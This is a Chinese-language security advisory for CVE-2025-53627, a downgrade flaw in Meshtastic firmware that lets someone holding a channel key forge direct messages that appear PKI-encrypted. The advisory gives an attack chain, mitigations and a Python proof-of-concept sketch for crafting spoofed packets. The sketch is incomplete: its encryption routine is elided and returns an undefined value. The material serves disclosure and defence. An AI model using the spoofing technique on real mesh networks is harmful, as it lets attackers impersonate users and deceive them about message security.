CVE-2025-53627: Meshtastic固件PKI加密降级攻击漏洞

漏洞信息

漏洞编号

CVE-2025-53627

漏洞类型

加密降级攻击

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Meshtastic Firmware, Meshtastic Web App, Meshtastic iOS/Android App, Meshtastic SDK

漏洞概述

CVE-2025-53627是Meshtastic开源网格网络解决方案中的一个安全漏洞。该漏洞存在于Meshtastic固件2.5版本引入的非对称加密（PKI）直接消息功能中。当直接消息缺少pki_encrypted标志时，固件会静默回退到传统的AES-256-CTR通道加密方式，以保持向后兼容性。然而，最终用户应用程序（如Web应用、iOS/Android应用及基于Meshtastic SDK构建的应用）无法区分端到端加密的直接消息和传统加密的直接消息。这为攻击者创造了一条降级攻击路径：只要知道共享频道密钥，攻击者就可以伪造并注入欺骗性直接消息，这些消息会被显示为PKI加密消息。用户无法获得任何关于直接消息是使用PKI还是传统对称加密解密的反馈，从而破坏了PKI推广的预期安全保证。攻击者可以利用此漏洞冒充合法用户发送虚假直接消息，绕过PKI加密的安全保证。

技术细节

该漏洞的根本原因在于加密协商过程中的安全降级机制。Meshtastic固件在版本2.5中引入了基于公钥基础设施（PKI）的直接消息加密功能，理论上提供了更强的安全保证。然而，当接收方固件或应用程序在解析消息时发现pki_encrypted标志缺失，它会静默地使用预先共享的AES-256-CTR对称密钥进行解密，而不向用户发出任何警告。攻击者只需要获取目标群组的共享频道密钥（这可以通过多种方式获得），即可构造带有伪造身份信息的直接消息。消息在目标客户端显示时，看起来与正常的PKI加密消息无异，用户无法识别消息来源的真实性。该漏洞影响整个Meshtastic生态系统，包括固件、各平台客户端应用以及第三方SDK实现，因为它们都缺乏区分两种加密方式的机制。

攻击链分析

STEP 1

步骤1

攻击者获取目标Meshtastic群组的共享频道密钥（AES-256密钥），可通过中间人攻击、群组密钥泄露或其他渠道获得

STEP 2

步骤2

攻击者构造直接消息（DM）数据包，故意省略pki_encrypted标志，使用共享频道密钥对消息内容进行AES-256-CTR加密

STEP 3

步骤3

攻击者将伪造的消息发送到目标Meshtastic节点，消息通过网格网络路由

STEP 4

步骤4

目标客户端接收到消息，由于缺少pki_encrypted标志，固件静默回退到传统AES-256-CTR解密方式

STEP 5

步骤5

消息解密成功并在客户端界面显示，用户无法识别该消息使用的是传统加密而非PKI加密，误以为是安全的端到端加密消息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-53627 PoC - Meshtastic PKI Downgrade Attack
# This PoC demonstrates crafting a spoofed direct message when channel key is known

import struct
import hashlib

def craft_spoofed_dm(mesh_packet, channel_key, spoofed_src):
    """
    Craft a spoofed direct message that bypasses PKI verification.
    
    Args:
        mesh_packet: Original mesh packet structure
        channel_key: Shared AES-256 channel key
        spoofed_src: Spoofed sender node ID
    """
    # Step 1: Create DM payload with spoofed source
    dm_payload = {
        'src': spoofed_src,
        'dst': mesh_packet['intended_dst'],
        'content': 'Malicious message content',
        'timestamp': mesh_packet['timestamp']
    }
    
    # Step 2: Encrypt using legacy AES-256-CTR (NOT PKI)
    # Note: Omitting pki_encrypted flag causes receiver to use legacy decryption
    encrypted_payload = aes256_ctr_encrypt(dm_payload, channel_key)
    
    # Step 3: Wrap in mesh packet WITHOUT pki_encrypted flag
    spoofed_packet = {
        'encrypted_payload': encrypted_payload,
        'pki_encrypted': None,  # Missing flag triggers legacy decryption
        'channel_id': mesh_packet['channel_id']
    }
    
    return spoofed_packet

def aes256_ctr_encrypt(payload, key):
    """Legacy AES-256-CTR encryption (used when pki_encrypted flag is missing)"""
    nonce = struct.pack('<Q', payload['timestamp'])
    # ... AES-256-CTR implementation
    return encrypted_data

# Attack scenario:
# 1. Attacker obtains shared channel key
# 2. Attacker crafts DM without pki_encrypted flag
# 3. Target client silently falls back to legacy decryption
# 4. Message displayed as legitimate PKI message

影响范围

Meshtastic Firmware >= 2.5.0 and < 2.7.15

Meshtastic Web App (all versions)

Meshtastic iOS App (all versions)

Meshtastic Android App (all versions)

Meshtastic SDK (all versions)

防御指南

临时缓解措施

由于该漏洞利用需要攻击者事先获取共享频道密钥，应立即轮换所有Meshtastic群组的频道密钥。同时，限制群组成员资格，确保只有可信用户能够加入。对于敏感通信，考虑使用独立的端到端加密通道替代Meshtastic直接消息功能，直到固件升级完成。